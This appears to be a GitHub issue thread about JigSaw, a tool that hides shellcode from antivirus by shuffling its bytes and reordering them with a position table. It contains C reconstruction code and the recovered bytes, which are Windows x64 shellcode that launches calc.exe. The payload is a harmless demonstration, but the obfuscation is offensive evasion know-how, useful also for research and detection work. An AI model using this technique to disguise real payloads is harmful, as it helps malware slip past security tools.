JigSaw Shellcode not working

[TeamOffsec]

I tired executing the example program to see if shell code is actually generated, but it seems like that the shellcode is not reconstructing. Do you think if I am doing anything wrong ?

int main() {
    unsigned char jigsaw[276] = { 0x5d, 0x8b, 0x8d, 0xc0, 0x01, 0x48, 0x80, 0x00, 0x87, 0x7c, 0xc0, 0x74, 0x48, 0x58, 0xd1, 0x95, 0x00, 0xe9, 0xbd, 0x63, 0xe0, 0x01, 0x65, 0x01, 0x4a, 0x48, 0x6f, 0x44, 0x6a, 0xa2, 0x0a, 0x4c, 0xb7, 0x88, 0x5a, 0x01, 0xbb, 0xac, 0x0d, 0xba, 0x4d, 0x41, 0x59, 0x42, 0x49, 0x50, 0x5e, 0xbb, 0x5a, 0x41, 0x83, 0xc9, 0x28, 0x20, 0x00, 0x52, 0x00, 0xd2, 0x24, 0x41, 0x4a, 0x01, 0xff, 0xd0, 0xff, 0x56, 0x20, 0x31, 0x56, 0x8b, 0x6c, 0x31, 0x12, 0xf0, 0x34, 0x48, 0xac, 0x41, 0x8b, 0x01, 0x58, 0x48, 0x48, 0x04, 0x88, 0x48, 0xff, 0x52, 0x05, 0x65, 0xc9, 0xc1, 0x48, 0x8b, 0x75, 0x40, 0xd0, 0x59, 0x4d, 0xff, 0x61, 0x1c, 0x75, 0x4c, 0x01, 0x52, 0x8b, 0xc9, 0x56, 0x8b, 0x0c, 0x48, 0x58, 0xf1, 0x41, 0x31, 0x00, 0xd0, 0xd0, 0xec, 0x00, 0x59, 0x13, 0xe0, 0x72, 0x8b, 0x48, 0xff, 0x40, 0xd0, 0x00, 0x02, 0x75, 0x85, 0x20, 0x80, 0xc4, 0x58, 0x48, 0xd6, 0xd8, 0x47, 0x41, 0x59, 0x48, 0x01, 0xa6, 0xda, 0x8b, 0x41, 0xc1, 0x00, 0xc1, 0x48, 0xff, 0x52, 0x00, 0xfc, 0x51, 0x3c, 0x8b, 0x57, 0xe2, 0x2c, 0x0d, 0x01, 0xed, 0x31, 0x58, 0x7c, 0xd5, 0x01, 0x41, 0x00, 0x3c, 0x45, 0x51, 0x01, 0x08, 0x41, 0x49, 0x65, 0x00, 0x44, 0x52, 0xd0, 0x48, 0x52, 0x00, 0x5a, 0x8b, 0x3c, 0xe8, 0xe3, 0x48, 0x40, 0x8d, 0xba, 0x31, 0x44, 0x01, 0xfb, 0xf0, 0x48, 0x83, 0x51, 0x2e, 0x8b, 0x00, 0x83, 0x48, 0x61, 0x00, 0x66, 0x88, 0x00, 0x41, 0x41, 0xd5, 0x06, 0x41, 0xe4, 0x52, 0x38, 0x60, 0x20, 0x6f, 0xc0, 0x48, 0x49, 0x41, 0x20, 0x63, 0xc0, 0x72, 0xc1, 0x8b, 0x39, 0xc9, 0xba, 0x78, 0x8b, 0x41, 0x8b, 0x41, 0x00, 0xff, 0x8b, 0x89, 0x48, 0x00, 0x31, 0xff, 0x41, 0x41, 0x50, 0xb5, 0x03, 0x48, 0x41, 0x18, 0x67, 0x48, 0x41, 0x50, 0x0f, 0x8b, 0x48, 0xe0, 0xd5, 0x24, 0x18, 0xc9, 0x9d, 0x48, 0x41 };

    int positions[276] = { 202, 22, 214, 6, 126, 104, 249, 81, 225, 51, 119, 86, 182, 142, 139, 236, 208, 197, 237, 267, 251, 89, 272, 217, 41, 83, 258, 95, 259, 231, 248, 132, 39, 110, 193, 148, 228, 48, 124, 234, 42, 107, 179, 72, 99, 91, 173, 254, 175, 121, 242, 116, 244, 70, 211, 23, 8, 19, 146, 169, 40, 167, 226, 168, 201, 103, 54, 222, 232, 96, 269, 18, 196, 229, 109, 29, 120, 55, 163, 100, 172, 25, 1, 164, 79, 33, 105, 27, 253, 20, 44, 122, 241, 223, 140, 157, 90, 261, 114, 199, 268, 158, 252, 134, 112, 187, 34, 57, 16, 108, 153, 194, 170, 131, 262, 115, 209, 149, 161, 184, 82, 174, 256, 129, 35, 156, 111, 188, 145, 76, 275, 52, 130, 84, 185, 78, 243, 177, 21, 113, 141, 255, 176, 192, 154, 216, 235, 264, 92, 191, 127, 260, 56, 88, 265, 69, 219, 0, 66, 49, 77, 198, 62, 53, 58, 205, 63, 46, 190, 247, 227, 160, 233, 206, 245, 137, 15, 75, 136, 151, 147, 274, 212, 155, 64, 101, 37, 14, 218, 181, 68, 73, 5, 102, 203, 97, 215, 204, 118, 143, 60, 250, 4, 67, 183, 11, 271, 71, 9, 2, 74, 50, 7, 150, 165, 207, 65, 10, 266, 246, 171, 3, 31, 128, 24, 32, 224, 47, 45, 159, 162, 98, 270, 85, 257, 61, 195, 138, 106, 221, 273, 30, 180, 152, 125, 210, 239, 26, 263, 117, 80, 43, 200, 220, 178, 36, 230, 133, 17, 186, 94, 87, 93, 12, 13, 38, 144, 166, 189, 240, 135, 28, 123, 238, 213, 59 };


    unsigned int calc_len = 276;
    char calc_payload[276] = { 0x00 };
    int position;

    // Reconstruct the payload
    for (int idx = 0; idx < sizeof(positions) / sizeof(positions[0]); idx++) {
        position = positions[idx];
        calc_payload[position] = jigsaw[idx];
    }

    printf("Decrypted Shellcode is %p\n", calc_payload);

    system("pause");
}

[hardwaterhacker]

Your printf statement will print out a pointer to the calc_payload buffer. If you want to verify the bytes in the buffer, you'd need to actually print the contents of the buffer, rather than printing the buffer address.

This code will allow you to see the contents of the buffer to verify it's been reassembled properly:

   for (int i = 0; i < sizeof(calc_payload) / sizeof(calc_payload[0]); i++) {
      printf("0x%02x, ", calc_payload[i]);
        }

Doing that will give you the contents. Note: For it to print out properly, I needed to change the declaration for char calc_payload to unsigned char calc_payload. I've updated the repo with this change.

└─$ ./jigsaw
0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51, 0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18, 0x48, 0x8b, 0x52, 0x20, 0x48, 0x8b, 0x72, 0x50, 0x48, 0x0f, 0xb7, 0x4a, 0x4a, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0, 0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0x41, 0xc1, 0xc9, 0x0d, 0x41, 0x01, 0xc1, 0xe2, 0xed, 0x52, 0x41, 0x51, 0x48, 0x8b, 0x52, 0x20, 0x8b, 0x42, 0x3c, 0x48, 0x01, 0xd0, 0x8b, 0x80, 0x88, 0x00, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x67, 0x48, 0x01, 0xd0, 0x50, 0x8b, 0x48, 0x18, 0x44, 0x8b, 0x40, 0x20, 0x49, 0x01, 0xd0, 0xe3, 0x56, 0x48, 0xff, 0xc9, 0x41, 0x8b, 0x34, 0x88, 0x48, 0x01, 0xd6, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0, 0xac, 0x41, 0xc1, 0xc9, 0x0d, 0x41, 0x01, 0xc1, 0x38, 0xe0, 0x75, 0xf1, 0x4c, 0x03, 0x4c, 0x24, 0x08, 0x45, 0x39, 0xd1, 0x75, 0xd8, 0x58, 0x44, 0x8b, 0x40, 0x24, 0x49, 0x01, 0xd0, 0x66, 0x41, 0x8b, 0x0c, 0x48, 0x44, 0x8b, 0x40, 0x1c, 0x49, 0x01, 0xd0, 0x41, 0x8b, 0x04, 0x88, 0x48, 0x01, 0xd0, 0x41, 0x58, 0x41, 0x58, 0x5e, 0x59, 0x5a, 0x41, 0x58, 0x41, 0x59, 0x41, 0x5a, 0x48, 0x83, 0xec, 0x20, 0x41, 0x52, 0xff, 0xe0, 0x58, 0x41, 0x59, 0x5a, 0x48, 0x8b, 0x12, 0xe9, 0x57, 0xff, 0xff, 0xff, 0x5d, 0x48, 0xba, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x8d, 0x01, 0x01, 0x00, 0x00, 0x41, 0xba, 0x31, 0x8b, 0x6f, 0x87, 0xff, 0xd5, 0xbb, 0xf0, 0xb5, 0xa2, 0x56, 0x41, 0xba, 0xa6, 0x95, 0xbd, 0x9d, 0xff, 0xd5, 0x48, 0x83, 0xc4, 0x28, 0x3c, 0x06, 0x7c, 0x0a, 0x80, 0xfb, 0xe0, 0x75, 0x05, 0xbb, 0x47, 0x13, 0x72, 0x6f, 0x6a, 0x00, 0x59, 0x41, 0x89, 0xda, 0xff, 0xd5, 0x63, 0x61, 0x6c, 0x63, 0x2e, 0x65, 0x78, 0x65, 0x00,